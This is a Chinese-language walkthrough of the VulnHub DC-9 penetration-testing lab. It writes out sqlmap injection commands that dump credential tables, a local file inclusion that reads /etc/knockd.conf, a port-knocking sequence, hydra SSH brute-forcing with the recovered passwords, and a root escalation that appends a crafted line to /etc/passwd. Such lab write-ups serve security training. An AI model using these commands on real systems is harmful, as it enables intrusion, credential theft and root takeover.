標簽：SQL注入、本地文件包含LFI、端口敲門、hydra爆破、linux提權

0x00 環(huán)境準備

下載地址：https://www.vulnhub.com/entry/dc-9,412/
flag數(shù)量：1
攻擊機：kali
攻擊機地址：192.168.1.31
靶機描述：

DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

0x01 信息搜集

1.探測靶機地址

命令：arp-scan -l

靶機地址192.168.1.38

2.探測靶機開放端口

命令：nmap -sV -p- 192.168.1.38

開放了22和80端口，但是22端口被過濾了，那就先看一下80端口

插件沒有識別到web指紋。

0x02 SQL注入

在search菜單下有個提交框，說不定存在POST注入

放到sqlmap里跑一下，命令：sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 --dbs

果然有注入，查詢到了3個數(shù)據(jù)庫，其中一個是系統(tǒng)自帶的，我們跑一下剩下兩個。

1.Staff數(shù)據(jù)庫

命令：sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 -D Staff --tables

查看數(shù)據(jù)表，命令：

StaffDetails表：
sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 -D Staff -T StaffDetails --columns

Users表：
sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 -D Staff -T Users --dump

StaffDetails表：

Users表：

看密碼的加密方式應該是md5，查一下值

在staff表中拿到了admin的登錄密碼admin \ transorbital1

2.users數(shù)據(jù)庫

命令：sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 -D users --tables

命令：sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 -D users -T UserDetails --dump

在UserDetails表中發(fā)現(xiàn)了很多賬號密碼，測試了幾個都不能登錄網(wǎng)站后臺，那就使用admin登錄吧，這幾組賬號密碼先保存起來后面可能會用到。

admin登錄成功了

0x03 本地文件包含LFI

使用admin登錄后，頁面上有一句提示（用紅框框起來了），可能存在文件包含漏洞，fuzz一下，這里猜測文件參數(shù)是file

已經(jīng)跑出來了

看樣子是相對路徑包含，不能用絕對路徑。

知道了是相對路徑，那就再跑一下其他文件

0x04 端口敲門

端口敲門

個人理解：端口敲門服務，即：knockd服務，是為了加強SSH的安全性而設計的。在正常情況下，黑客如果可以掃描到服務器的22端口是開放狀態(tài)，那么就可以對該端口進行爆破，這樣22端口是不安全的。在配置了knockd服務情況下，22端口默認是關閉的，knockd服務會偵聽以太網(wǎng)或其他可用接口上的所有流量，等待特殊序列的端口命中(port-hit)，當特殊序列的端口命中時，那么SSH所在的22端口就會被打開。

舉個例子：假如knockd服務中定義了如下三個端口：4444、6666和7777為特殊序列的端口。在默認情況下，22端口是關閉的，當我們依次訪問了這三個自定義的端口后，22端口就會自動開啟。這樣，只有知道自定義端口的人才能夠訪問22端口，黑客如果不知道自定義端口就無法開啟22端口。

我們剛才已經(jīng)爆破出/etc/knockd.conf文件了，現(xiàn)在看一下/etc/knockd.conf文件中的自定義端口

有3個自定義端口，分別是：7469，8475，9842
依次訪問這三個端口就可以打開SSH服務了，命令：

nmap -p 7469 192.168.1.38
nmap -p 8475 192.168.1.38
nmap -p 9842 192.168.1.38

現(xiàn)在看一下ssh端口，命令：nmap -p 22 192.168.1.38

開放了，這里敲門我敲了半天，甚至還重啟了一次靶機，最后突然就敲開了，玄學。

0x05 hydra爆破SSH

剛才sql注入的時候，拿到了很多用戶名和密碼，把它們分別保存。

然后使用hydra進行ssh爆破。命令：hydra -L user.txt -P pass.txt -t 10 ssh://192.168.1.38

爆破出來3個賬號：chandlerb \ UrAG0D!、joeyt \ Passw0rd、janitor \ Ilovepeepee
分別登陸這三個用戶，在janitor用戶下發(fā)現(xiàn)了隱藏文件，輸入ls無結果，輸入ls -la發(fā)現(xiàn)了文件。

這個文件看起來是一個存放密碼的文件，將密碼復制到剛才的密碼pass.txt中，再次使用hydra進行爆破

爆破出了一個新的賬號：fredf \ B4-Tru3-001

0x06 提權

使用新的賬號可以使用sudo進行權限枚舉

這里發(fā)現(xiàn)fred用戶在NOPASSWD的情況下可以使用root權限運行這個test文件，嘗試運行，發(fā)現(xiàn)它是一個python文件，查找test.py文件

查看test.py文件

該文件需要傳入三個參數(shù)，這三個參數(shù)都是文件，傳入三個參數(shù)后，會讀取第二個文件，然后將第二個文件的內容追加到第三個文件里。
既然這樣，我們就可以利用這個程序向/etc/passwd文件后追加一個擁有root權限的賬戶，也就是說把/etc/passwd文件設置為第三個參數(shù)，而第二個參數(shù)由我們自己創(chuàng)建，這個文件里是擁有root權限賬戶的信息，第一個參數(shù)隨便寫一個就好。

我們先使用openssl來創(chuàng)建第二個參數(shù)文件中的內容，
命令：openssl passwd -1 -salt dn 111111
這條命令的意思是創(chuàng)建一個用戶名為dn，密碼為111111的用戶

-1 的意思是使用md5加密算法
-salt 自動插入一個隨機數(shù)作為文件內容加密

生成后，根據(jù)/etc/passwd的格式，把它修改一下，然后存在靶機中的一個文件里，這個文件就是參數(shù)2
修改后的值：dn:$1$dn$af67d2P6bAKTKU2Y5vwMV0:0:0::/root:/bin/bash

最后，調用test.py進行提權

flag在/root下

由于我不會每天都登錄簡書，所以有什么私信或者評論我都不能及時回復，如果想要聯(lián)系我最好給我發(fā)郵件，郵箱：Z2djMjUxMTBAMTYzLmNvbQ==，如果發(fā)郵件請備注“簡書”

參考鏈接：

1.『VulnHub系列』DC: 9-Walkthrough
2.記一次vulnhub|滲透測試 DC-9
3.vulnhub靶機DC-9滲透測試
4.保護 SSH 的三把鎖